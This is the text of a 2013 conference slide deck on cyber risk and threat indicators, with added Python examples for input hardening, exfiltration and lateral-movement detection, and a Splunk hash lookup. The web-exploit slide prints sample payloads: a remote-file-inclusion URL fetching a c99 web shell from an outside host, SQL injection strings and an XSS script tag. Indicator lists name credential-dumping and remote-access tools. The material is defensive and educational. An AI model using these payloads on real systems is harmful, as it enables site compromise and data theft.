Cyber Risk and Threat Indicators - splunkconf · 2017. 10. 13.
Cyber Risk and Threat Indicators Shane Shook, PhD
Chief Knowledge Officer and Global Vice President of Consulting, Cylance
#splunkconf
Risk Does Not Equal Threat | Cyber Risks and Threat Indicators
Malware – Windows / Linux / OSX (31% didn’t use malware)
• Dropper/downloaders – Phishing & waterholing malware in userspace; zero/single-day exploits that lead to…
• Backdoor Trojan RATs – Kernel-interactive service binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)
• BOTNETs – Platforms for MAAS/subscription access
• WebShells – Internet-facing server backdoor RATs (c99/r57/eval)
Hacking – .day Exploits
• Zero day – Vulnerability that only the developer knows about
• ½ day – Vulnerability that is known about but no patches are yet available
• Single day – Vulnerability that is known about and patches are available but not applied
• Forever day – Vulnerability that is known and cannot be patched
Hacking – Web Server/Services Exploits
• Remote code execution (watch your .htaccess files!) – register_globals on in PHP | require ($page . ".php");
  → http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt
• SQL injection (watch your user privileges!) – AND / OR in SQL $query | $query = "SELECT * FROM users WHERE username = '' or '1=1'";
  → http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version)
• Cross Site Scripting/XSS (watch your syntax!) – Volatile entry in echo | <?php echo "<p>Your Name <br />"; echo ($_GET[name_1]); ?>
  → http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>
• Username enumeration (watch your error messages!) – Username guessing | "Incorrect logon / password combination"
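The three code fragments on this slide each splice request input straight into a query, a page, or an include path. The following is an added example, not from the slide deck or from Cylance, that reproduces the SQL injection and XSS patterns in Python with an in-memory SQLite table and places the hardened form next to each: a bound parameter instead of string splicing, HTML encoding before output, and an allowlist instead of a user-supplied include name. The users table, the allowlist and the page names are constructed for the example.

```python
import html
import sqlite3

# Constructed sample users; stand-in for the site's real users table.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]

# Constructed allowlist of page names the hypothetical index.php may include.
ALLOWED_PAGES = {"home", "about", "contact"}


def make_db():
    """Build an in-memory SQLite users table from the constructed sample."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_unsafe(conn, username):
    """The slide's pattern: the request parameter is spliced into the SQL text,
    so a quote in the input rewrites the WHERE clause."""
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username):
    """Hardened form: bound parameter; the input is data and cannot change the query."""
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


def render_name_unsafe(name):
    """The slide's echo($_GET[name_1]) pattern: the value lands in the page untouched."""
    return "<p>Your Name <br />" + name + "</p>"


def render_name_safe(name):
    """Hardened form: HTML-encode before echoing so markup in the value is inert text."""
    return "<p>Your Name <br />" + html.escape(name, quote=True) + "</p>"


def resolve_page(page):
    """Hardened form of require($page . ".php"): only a name from the allowlist
    maps to a local file; URLs, paths and anything else are rejected (None)."""
    if page in ALLOWED_PAGES:
        return page + ".php"
    return None


if __name__ == "__main__":
    conn = make_db()
    injected = "' or '1=1"   # the quoting trick from the slide's example
    print("unsafe:", login_unsafe(conn, injected))   # every user comes back
    print("safe:  ", login_safe(conn, injected))     # no such user: empty list
    print(render_name_safe("<script>HERE_IS_MY_CODE</script>"))
    print(resolve_page("http://www.ilikeyoursite.com/c99.txt"))
```

The unsafe login turns the slide's input into WHERE username = '' or '1=1', which SQLite (like MySQL) evaluates as true for every row; the bound-parameter version compares the literal string and returns nothing. The same "data, not code" rule is what the escape and the allowlist enforce for the other two cases.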
Social Engineering – Access, Behavior, and Authority
Subversion
• Contractors
• Employees
Sabotage
• Phishing
• Waterholing
• USB “HoneyDrops” & other free hardware
• “HelpDesk Operators”
• “Visitors” (repairmen, janitors, pizza/flower delivery, tailgaters)
Advanced Persistent Threat – Activities
Stage 1 - Compromise
• Social engineering backdoors
• Phishing / waterholing
• Help Desk / visitors
• Web site backdoors
• Reconnaissance
Stage 2 - Exploit
• Privilege escalation
• Lateral movement
• User profile abuse
• Remote access provisioning
• Services bypass/cancellation
Stage 3 - Control
• Configuration management
• Data targeting
• Data exfiltration
• Sabotage
• Subversion
Most Commonly Seen Indicators of Data Loss:
• Non-standard packagers (7z, Gz, RAR, PKZIP, etc.)
• Multipart files of particular sizes (250/500Mb)
• “Recycle”/RecycleBin residue
• HTTP 206 status codes on web servers
• Non-standard file transfer services (Filezilla, FTP, WsFTP, etc.)
• Non-standard reverse/proxy services (HUCs, PLINK, NC, SSH, etc.)
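Two of the indicators above can be checked mechanically from data Presponse already collects: split-archive parts of a uniform 250/500 MB size in the filesystem inventory, and HTTP 206 (Partial Content) responses in web server logs, which appear when a client fetches a large file in ranges. This is an added example, not part of the deck or of Presponse, written in Python over a constructed file inventory ("path|size|owner") and constructed combined-format access log lines; the naming patterns for split archives and the 2% size tolerance are the example's own assumptions.

```python
import re
from collections import defaultdict

MB = 1024 * 1024
# Part sizes the slide calls out for multipart archives.
SUSPECT_PART_SIZES = (250 * MB, 500 * MB)

# Split-archive naming (assumed set): name.7z.001, name.zip.002, name.r00, name.z01
MULTIPART_RE = re.compile(
    r"^(?P<base>.+?)(?:\.(?:7z|zip|rar))?\.(?:\d{3}|r\d{2}|z\d{2})$", re.IGNORECASE)

# Combined-log-format line: enough fields to read client, request path and status.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed file inventory: "<path>|<size in bytes>|<owner>"
SAMPLE_INVENTORY = [
    r"C:\Users\jdoe\AppData\Local\Temp\q1.7z.001|262144000|jdoe",
    r"C:\Users\jdoe\AppData\Local\Temp\q1.7z.002|262144000|jdoe",
    r"C:\Users\jdoe\AppData\Local\Temp\q1.7z.003|104857600|jdoe",
    r"C:\Users\jdoe\Documents\report.zip|3145728|jdoe",
    r"C:\inetpub\backup\site.zip.001|1048576|SYSTEM",
    r"C:\inetpub\backup\site.zip.002|1048576|SYSTEM",
]

# Constructed web server access log lines.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [12/Oct/2013:02:14:01 +0000] "GET /backup/site.zip.001 HTTP/1.1" 206 1048576 "-" "curl/7.30"',
    '203.0.113.7 - - [12/Oct/2013:02:14:05 +0000] "GET /backup/site.zip.001 HTTP/1.1" 206 1048576 "-" "curl/7.30"',
    '198.51.100.4 - - [12/Oct/2013:02:15:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def find_multipart_sets(lines, tolerance=0.02):
    """Group split-archive parts by base name and owner; flag a set when the
    size most of its parts share is within `tolerance` of 250 MB or 500 MB.
    Returns (base, owner, part_count, part_size_mb) tuples."""
    sizes_by_set = defaultdict(list)
    for line in lines:
        path, size, owner = line.rsplit("|", 2)
        name = path.replace("\\", "/").rsplit("/", 1)[-1]
        m = MULTIPART_RE.match(name)
        if m:
            sizes_by_set[(m.group("base"), owner)].append(int(size))
    flagged = []
    for (base, owner), sizes in sorted(sizes_by_set.items()):
        if len(sizes) < 2:
            continue
        chunk = max(set(sizes), key=sizes.count)   # the size most parts share
        if any(abs(chunk - s) <= tolerance * s for s in SUSPECT_PART_SIZES):
            flagged.append((base, owner, len(sizes), round(chunk / MB)))
    return flagged


def find_partial_content(lines):
    """Count HTTP 206 responses per (client, path); ranged pulls of one file
    from one client are the pattern worth a second look."""
    counts = defaultdict(int)
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and m.group("status") == "206":
            counts[(m.group("ip"), m.group("path"))] += 1
    return sorted(counts.items())


if __name__ == "__main__":
    for base, owner, parts, size_mb in find_multipart_sets(SAMPLE_INVENTORY):
        print("multipart set %s (%d parts of ~%d MB) owned by %s" % (base, parts, size_mb, owner))
    for (ip, path), n in find_partial_content(SAMPLE_ACCESS_LOG):
        print("%d partial-content responses to %s for %s" % (n, ip, path))
```

Neither check is proof of exfiltration on its own; the slide's point is that these are indicators to join with the user history of the owner and the client, which is what the owner field and client address in the output are there for.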
Most Commonly Seen Indicators of Sabotage:
• Unusual Prefetch / Recent / LNK / Bash binary execution history
• AT / CRON jobs
• Scripts
• Services cancellation
• User profile authority changes
Most Commonly Seen Indicators of User Profile Abuse:
• Multiple user accounts on single computer
• User account on multiple computers
• Service & administrative account propagation
• Extranet LDAP/AD account use
• Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)
• Local services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)
Most Commonly Seen Indicators of Lateral Movement:
• Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)
• MSTSC history (.RDP, .BMC)
• Remote job scheduling (AT, SC, WMIC, SSH)
• Redundant & non-standard RAS tools (VNC, LogMeIn, TeamView, NC, PUTTY, PSEXEC, *FTP, SCP)
• Domain services history (DSGET, DSQUERY, HYENA)
• Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)
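The first two "User Profile Abuse" indicators (one account on many computers, many accounts on one computer) and the "Access history" indicator for lateral movement can all be derived from the same successful-logon events. The following is an added example, not from the deck or from Presponse, that runs those three checks in Python over constructed Windows 4624 records flattened to CSV (time, host, event id, logon type, account, source workstation). Logon types 3, 4, 8 and 10 are the remote types the slide lists; type 2 is a local interactive logon. The hop check (a remote logon whose source workstation is a host the same account already reached remotely) and the thresholds of three hosts and three accounts are the example's own assumptions.

```python
from collections import defaultdict

# Constructed Windows 4624 (successful logon) records, flattened to CSV:
# time,host,event_id,logon_type,account,workstation (source host, "-" if local)
SAMPLE_EVENTS = """\
2013-10-12T01:02:03,WS01,4624,10,CORP\\svc_backup,JUMP01
2013-10-12T01:10:00,WS02,4624,10,CORP\\svc_backup,WS01
2013-10-12T01:20:00,FS01,4624,3,CORP\\svc_backup,WS02
2013-10-12T01:25:00,DC01,4624,3,CORP\\svc_backup,WS02
2013-10-12T08:00:00,WS03,4624,2,CORP\\alice,-
2013-10-12T08:05:00,WS03,4624,2,CORP\\bob,-
2013-10-12T08:10:00,WS03,4624,2,CORP\\carol,-
2013-10-12T09:00:00,WS04,4624,2,CORP\\alice,-
""".splitlines()

# Logon types the slide lists as lateral-movement evidence:
# 3 network, 4 batch, 8 network cleartext, 10 remote interactive (RDP).
REMOTE_LOGON_TYPES = {"3", "4", "8", "10"}
INTERACTIVE_LOGON_TYPE = "2"
FIELDS = ("time", "host", "event_id", "logon_type", "account", "workstation")


def parse_events(lines):
    """Turn the CSV lines into dicts keyed by FIELDS, skipping blank lines."""
    return [dict(zip(FIELDS, line.split(","))) for line in lines if line.strip()]


def remote_logon_fanout(events, min_hosts=3):
    """User account on multiple computers: accounts with remote logons to at
    least min_hosts distinct hosts. Returns {account: sorted hosts}."""
    hosts = defaultdict(set)
    for e in events:
        if e["event_id"] == "4624" and e["logon_type"] in REMOTE_LOGON_TYPES:
            hosts[e["account"]].add(e["host"])
    return {a: sorted(h) for a, h in hosts.items() if len(h) >= min_hosts}


def shared_workstations(events, min_accounts=3):
    """Multiple user accounts on a single computer: hosts with interactive
    logons from at least min_accounts distinct accounts. Returns {host: sorted accounts}."""
    accounts = defaultdict(set)
    for e in events:
        if e["event_id"] == "4624" and e["logon_type"] == INTERACTIVE_LOGON_TYPE:
            accounts[e["host"]].add(e["account"])
    return {h: sorted(a) for h, a in accounts.items() if len(a) >= min_accounts}


def hop_chains(events):
    """Hop detection: a remote logon whose source workstation is a host the
    same account already logged on to remotely. Returns (account, source, dest)
    triples in time order."""
    reached = defaultdict(set)
    hops = []
    for e in sorted(events, key=lambda e: e["time"]):
        if e["event_id"] != "4624" or e["logon_type"] not in REMOTE_LOGON_TYPES:
            continue
        if e["workstation"] in reached[e["account"]]:
            hops.append((e["account"], e["workstation"], e["host"]))
        reached[e["account"]].add(e["host"])
    return hops


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    print("accounts fanning out:", remote_logon_fanout(events))
    print("shared workstations:", shared_workstations(events))
    for account, src, dst in hop_chains(events):
        print("hop: %s from %s to %s" % (account, src, dst))
```

On the constructed data the service account reaches four hosts in a chain that starts at a jump host, while WS03 sees three interactive users in an hour; each result is a candidate for the user-history review the deck calls for, not a verdict by itself.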
Most Commonly Seen Indicators of Insider Threats:
• Unusual profile access and use history
  – Time
  – HostID
  – Application history
  – Configuration history
• RBAC violations
• Other acceptable use policy violations
• Malware / PUP / PUM…
Most Common Malware Identifiers:
• Authority – service, administrator, or user
• Persistence – only 4 persistence mechanisms in Windows
• Communications – only 44 netsvcs keys in Windows Services
• Functionality – user and kernel combinations are rare
• File System – user or system
Cylance Presponse™ Method
Scope of the Investigation – Coverage of the IT Environment:
• File and Operating System Audit
• Network Logs Audit
• Host Memory Analysis
• Host Disk Forensics
• Network Forensics
Phases: Phase 1 (Diagnose) → Phase 2 (Assess) → Phase 3 (Collect)
Collection: Windows.bat, Linux.sh, OSX.sh
Processing: Presponse.py – Extraction • Parsing • Normalization • Transform • Load
Analysis: SQL, Excel PowerPivot
Reporting: Compromise Assessment, Exhibits
Cylance Infinity – Machine Learning for Advanced Detection
Cylance Infinity API – Submit Files or Lookup Hashes
Presponse on Splunk
Splunk Universal Forwarder
• Scripted input collection of Presponse Phase 1 data
• Leverage the existing Splunk deployment
• Managed via the Splunk Development Server
Presponse App
• Saved searches
  – Data loss or sabotage
  – User profile propagation
  – Lateral movement
  – Malware and IOCs
  – Build and application inconsistencies
• Dashboards, form searches and other views
• Field extractions
• Lookups (e.g. Infinity)
SourceTypes
• Processes
  – Executable path
  – Modules
  – Handles
  – Connections
• Services
• Autoruns
• Tasks
• Prefetch
• Filesystem
• User profiles
Infinity External Lookup Add-on
• Reusable Splunk component that packages an external lookup script based on py2INFINITY
• Lookup SHA-256 (and soon MD5) hashes in sourcetypes
• Extend with file upload/response capability
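A Splunk external lookup script follows a fixed contract: Splunk passes the field names as arguments, streams the rows needing enrichment as CSV on stdin, and expects the same CSV header back on stdout with the output fields filled in. The following is an added example, not the add-on's own script and not py2INFINITY, showing that contract in Python for a SHA-256 lookup. The hash-to-verdict table is a constructed local stand-in for the Infinity API (the real add-on would query the service), and the field names sha256, infinity_verdict and infinity_score, the verdict strings and the scores are the example's own assumptions.

```python
import csv
import hashlib
import sys

# Constructed stand-in for the Infinity hash-lookup service. The real add-on would
# ask the API through py2INFINITY; here two constructed sample digests map to a
# (verdict, score) pair so the lookup contract can be exercised offline.
SAMPLE_BAD = hashlib.sha256(b"constructed malicious sample").hexdigest()
SAMPLE_GOOD = hashlib.sha256(b"constructed benign sample").hexdigest()
LOCAL_VERDICTS = {
    SAMPLE_BAD: ("malicious", "-97"),
    SAMPLE_GOOD: ("safe", "88"),
}

INPUT_FIELD = "sha256"                                  # assumed field name
OUTPUT_FIELDS = ("infinity_verdict", "infinity_score")  # assumed field names


def local_lookup(sha256):
    """Return (verdict, score) for a digest; unknown digests stay 'unknown'."""
    return LOCAL_VERDICTS.get(sha256, ("unknown", ""))


def fill_rows(rows, lookup=local_lookup):
    """Fill the output fields of each row that carries a well-formed SHA-256
    (64 hex characters, any case); other rows pass through untouched so the
    event is kept rather than dropped."""
    filled = []
    for row in rows:
        row = dict(row)
        digest = (row.get(INPUT_FIELD) or "").strip().lower()
        if len(digest) == 64 and all(c in "0123456789abcdef" for c in digest):
            row["infinity_verdict"], row["infinity_score"] = lookup(digest)
        filled.append(row)
    return filled


def main(argv, stdin, stdout):
    """Splunk external lookup protocol: field names arrive as arguments, rows as
    CSV on stdin, and the same header goes back on stdout with outputs filled."""
    if INPUT_FIELD not in argv[1:]:
        sys.stderr.write("usage: %s %s %s\n" % (argv[0], INPUT_FIELD, " ".join(OUTPUT_FIELDS)))
        return 1
    reader = csv.DictReader(stdin)
    writer = csv.DictWriter(stdout, fieldnames=reader.fieldnames)
    writer.writeheader()
    for row in fill_rows(reader):
        writer.writerow(row)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv, sys.stdin, sys.stdout))
```

To wire a script like this in, the add-on's transforms.conf would carry a stanza whose external_cmd names the script and its fields (for example "external_cmd = infinity_lookup.py sha256 infinity_verdict infinity_score" with "fields_list = sha256, infinity_verdict, infinity_score"); the script and stanza names here are assumed. The script never contacts a network here, which is also why a real deployment caches verdicts: every matching row in a search becomes one lookup call.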
1. What files are known bad?
2. What files are unknown?
3. Where are the files located in FS?
4. How many computers are they on?
5. When were they created?
6. Who used them?
• Malware is only an indicator, not a threat
• It is a risk that should be evaluated by related user history
• A threat is determined by the impact it had or may have on the business
When is a Risk a Threat?
Risk                  | Threat
----------------------|---------------------------------------------
Unpatched software    | Vulnerable to exploits
“.”day exploit        | Used in place of malware
Malware               | Used to reconnoiter or sabotage systems
Uncontrolled access   | Persistent access to non-public information
Undocumented systems  | Lack of awareness
Tools vs. experience  | Lack of perspective
Outsourcing           | Lack of control
[email protected] | Cyber Risks and Threat Indicators
Next Steps
1. Download the .conf2013 Mobile App – if not iPhone, iPad or Android, use the Web App
2. Take the survey & WIN A PASS FOR .CONF2014… or one of these bags!
3. Check out the other “Using Splunk” presentations – all PPTs are in the Mobile App; videos will be uploaded shortly